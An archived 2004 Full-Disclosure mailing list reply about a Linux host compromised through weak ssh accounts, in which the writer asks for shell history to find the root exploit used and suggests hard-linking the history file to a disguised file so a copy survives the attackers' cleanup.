[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <1093542315.541.32.camel@localhost>
From: frank at knobbe.us (Frank Knobbe)
Subject: Automated ssh scanning
On Wed, 2004-08-25 at 17:32, Richard Verwayen wrote:
> The attackers installed some software and irc-bots and tried to use this
> host for testing other computers, thats not the point. I would like to
> know where's the weak point in the system? As the system was updates on
> a daily base! The only known weakness were these two accounts!
How do you know what they brought in? Do you have shell history files
available? Care to share them with us? Shell history should (if left
over) should give a clue to not just what they brought in, but also how
they used it. That will answer your question as to what local root
exploit they used.
If you don't have shell history files left over, try repeating the
experiment with .history hard-linked to something like
.opera/adprefs.ini (create other .opera/ files as cover). Once they
clean up and delete the .history file, you should be left with a copy in
.opera/adprefs.ini. (Depending on the clue level of the script kiddie he
may not find the linked copy).
If you do have .history content, or other log info, pleas share it here
with us.
Regards,
Frank
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 187 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20040826/511a5141/attachment.bin
Powered by blists - more mailing lists